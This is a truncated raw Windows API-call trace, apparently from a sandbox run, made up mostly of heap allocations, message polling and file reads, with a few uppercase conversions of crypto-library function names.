[0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0192.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0192.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.803] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.803] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x71e4, lpOverlapped=0x0) returned 1 [0192.806] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x71e4) returned 0xbea018 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x71e4) returned 0xbf1208 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x71e4) returned 0xbea018 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.808] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.808] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.809] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x71e4) returned 0xbea018 [0192.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x71e4) returned 0xbf83f8 [0192.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.811] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.811] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.812] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.813] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.813] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.816] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0192.817] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.818] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 